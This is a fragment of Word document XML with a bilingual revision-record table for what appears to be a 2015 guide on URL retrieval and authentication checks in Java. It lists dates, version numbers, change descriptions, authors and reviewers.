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679" w:rsidRPr="006563F8" w:rsidRDefault="002E2679" w:rsidP="002E2679">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:cs="宋体"/>
          <w:b/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006563F8">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>修订记录</w:t>
      </w:r>
      <w:r w:rsidRPr="006563F8">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:cs="宋体"/>
          <w:b/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Revision record</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="center"/>
        <w:tblCellMar>
          <w:left w:w="57" w:type="dxa"/>
          <w:right w:w="57" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1211"/>
        <w:gridCol w:w="973"/>
        <w:gridCol w:w="3237"/>
        <w:gridCol w:w="1500"/>
        <w:gridCol w:w="1499"/>
      </w:tblGrid>
      <w:tr w:rsidR="002E2679" w:rsidTr="005857D3">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="719" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="002E2679" w:rsidRDefault="002E2679" w:rsidP="00303753">
            <w:pPr>
              <w:pStyle w:val="afa"/>
              <w:widowControl/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>日期</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002E2679" w:rsidRDefault="002E2679" w:rsidP="00303753">
            <w:pPr>
              <w:pStyle w:val="afa"/>
              <w:widowControl/>
            </w:pPr>
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="578" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="002E2679" w:rsidRDefault="002E2679" w:rsidP="00303753">
            <w:pPr>
              <w:pStyle w:val="afa"/>
              <w:widowControl/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>修订版本</w:t>
            </w:r>
            <w:r>
              <w:t>Revision version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1922" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="002E2679" w:rsidRDefault="002E2679" w:rsidP="00303753">
            <w:pPr>
              <w:pStyle w:val="afa"/>
              <w:widowControl/>
              <w:rPr>
                <w:rFonts w:ascii="宋体"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">修改描述 </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002E2679" w:rsidRDefault="002E2679" w:rsidP="00303753">
            <w:pPr>
              <w:pStyle w:val="afa"/>
              <w:widowControl/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体"/>
              </w:rPr>
              <w:t xml:space="preserve">change </w:t>
            </w:r>
            <w:r>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="891" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="002E2679" w:rsidRDefault="002E2679" w:rsidP="00303753">
            <w:pPr>
              <w:pStyle w:val="afa"/>
              <w:widowControl/>
              <w:rPr>
                <w:rFonts w:ascii="宋体"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>作者</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002E2679" w:rsidRDefault="002E2679" w:rsidP="00303753">
            <w:pPr>
              <w:pStyle w:val="afa"/>
              <w:widowControl/>
            </w:pPr>
            <w:r>
              <w:t>Author</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="890" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="002E2679" w:rsidRDefault="002E2679" w:rsidP="00303753">
            <w:pPr>
              <w:pStyle w:val="afa"/>
              <w:widowControl/>
              <w:rPr>
                <w:rFonts w:ascii="宋体"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>审核</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E2679" w:rsidTr="005857D3">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:hRule="exact" w:val="341"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="719" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="002E2679" w:rsidRPr="00A11221" w:rsidRDefault="002E2679" w:rsidP="002E2679">
            <w:pPr>
              <w:pStyle w:val="a5"/>
            </w:pPr>
            <w:r w:rsidRPr="00A11221">
              <w:t>20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r w:rsidRPr="00A11221">
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>07</w:t>
            </w:r>
            <w:r w:rsidRPr="00A11221">
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="578" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="002E2679" w:rsidRPr="00A11221" w:rsidRDefault="002E2679" w:rsidP="00303753">
            <w:pPr>
              <w:pStyle w:val="a5"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1922" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="002E2679" w:rsidRPr="00A11221" w:rsidRDefault="002E2679" w:rsidP="005857D3">
            <w:pPr>
              <w:pStyle w:val="a5"/>
            </w:pPr>
            <w:r w:rsidRPr="00A11221">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>初稿完成</w:t>
            </w:r>
            <w:r w:rsidRPr="00A11221">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="891" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="002E2679" w:rsidRPr="00A11221" w:rsidRDefault="002E2679" w:rsidP="00303753">
            <w:pPr>
              <w:pStyle w:val="a5"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>余志刚</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="890" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="002E2679" w:rsidRPr="00A11221" w:rsidRDefault="002E2679" w:rsidP="00303753">
            <w:pPr>
              <w:pStyle w:val="a5"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E2679" w:rsidTr="005857D3">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:hRule="exact" w:val="614"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="719" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="002E2679" w:rsidRPr="00A11221" w:rsidRDefault="00F775BD" w:rsidP="00F775BD">
            <w:pPr>
              <w:pStyle w:val="a5"/>
            </w:pPr>
            <w:r w:rsidRPr="00A11221">
              <w:t>20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r w:rsidRPr="00A11221">
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>07</w:t>
            </w:r>
            <w:r w:rsidRPr="00A11221">
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="578" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="002E2679" w:rsidRPr="00A11221" w:rsidRDefault="00F775BD" w:rsidP="00303753">
            <w:pPr>
              <w:pStyle w:val="a5"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>0.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1922" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="002E2679" w:rsidRPr="00A11221" w:rsidRDefault="00225DDC" w:rsidP="00303753">
            <w:pPr>
              <w:pStyle w:val="a5"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>增加</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="891" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="002E2679" w:rsidRPr="00A11221" w:rsidRDefault="00F775BD" w:rsidP="0016743B">
            <w:pPr>
              <w:pStyle w:val="a5"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>余志刚</w:t>
            </w:r>
            <w:r w:rsidR="0016743B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="00F775BD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>陆晓辉</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="890" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="002E2679" w:rsidRDefault="0028420C" w:rsidP="00303753">
            <w:pPr>
              <w:pStyle w:val="a5"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>李花、叶文忠、张淼、李科</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0028420C" w:rsidRPr="0028420C" w:rsidRDefault="0028420C" w:rsidP="00303753">
            <w:pPr>
              <w:pStyle w:val="a5"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E2679" w:rsidTr="005857D3">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:hRule="exact" w:val="1648"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="719" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="002E2679" w:rsidRPr="00A11221" w:rsidRDefault="00875E80" w:rsidP="00875E80">
            <w:pPr>
              <w:pStyle w:val="a5"/>
            </w:pPr>
            <w:r w:rsidRPr="00A11221">
              <w:t>20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r w:rsidRPr="00A11221">
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>07</w:t>
            </w:r>
            <w:r w:rsidRPr="00A11221">
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="578" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="002E2679" w:rsidRPr="00A11221" w:rsidRDefault="00875E80" w:rsidP="00303753">
            <w:pPr>
              <w:pStyle w:val="a5"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>0.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1922" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="002E2679" w:rsidRDefault="005857D3" w:rsidP="00303753">
            <w:pPr>
              <w:pStyle w:val="a5"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、修改</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Java</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>下正确的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>URL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>获取方法</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005857D3" w:rsidRDefault="005857D3" w:rsidP="00303753">
            <w:pPr>
              <w:pStyle w:val="a5"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、增加推荐解决方案</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005857D3" w:rsidRDefault="005857D3" w:rsidP="00303753">
            <w:pPr>
              <w:pStyle w:val="a5"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、修改排查结果反馈格式</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005857D3" w:rsidRPr="005857D3" w:rsidRDefault="005857D3" w:rsidP="00303753">
            <w:pPr>
              <w:pStyle w:val="a5"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、修改排查指导的描叙</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="891" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="002E2679" w:rsidRPr="00A11221" w:rsidRDefault="00875E80" w:rsidP="00303753">
            <w:pPr>
              <w:pStyle w:val="a5"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>余志刚、</w:t>
            </w:r>
            <w:r w:rsidRPr="00F775BD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>陆晓辉</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="890" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00875E80" w:rsidRDefault="00875E80" w:rsidP="00875E80">
            <w:pPr>
              <w:pStyle w:val="a5"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>何伟祥、李花、叶文忠、</w:t>
            </w:r>
            <w:r w:rsidRPr="00875E80">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>杨淑秋</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="00875E80">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>刘金刚</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、张淼、李科</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002E2679" w:rsidRPr="00875E80" w:rsidRDefault="002E2679" w:rsidP="00303753">
            <w:pPr>
              <w:pStyle w:val="a5"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D3A5F" w:rsidTr="000D3A5F">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:hRule="exact" w:val="1043"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="719" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="000D3A5F" w:rsidRDefault="000D3A5F" w:rsidP="000D3A5F">
            <w:pPr>
              <w:widowControl/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A11221">
              <w:t>20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r w:rsidRPr="00A11221">
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>07</w:t>
            </w:r>
            <w:r w:rsidRPr="00A11221">
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="578" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="000D3A5F" w:rsidRDefault="000D3A5F" w:rsidP="00303753">
            <w:pPr>
              <w:widowControl/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1922" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="000D3A5F" w:rsidRDefault="000D3A5F" w:rsidP="000D3A5F">
            <w:pPr>
              <w:pStyle w:val="a5"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000D3A5F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>“</w:t>
            </w:r>
            <w:r w:rsidRPr="000D3A5F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">4 </w:t>
            </w:r>
            <w:r w:rsidRPr="000D3A5F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>推荐解决方案”中“认证判断”细化为“判断是否需要认证”和“判断是否已认证”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="891" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="000D3A5F" w:rsidRDefault="000D3A5F" w:rsidP="00303753">
            <w:pPr>
              <w:widowControl/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>余志刚、李花</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="890" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="000D3A5F" w:rsidRDefault="000D3A5F" w:rsidP="000D3A5F">
            <w:pPr>
              <w:pStyle w:val="a5"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
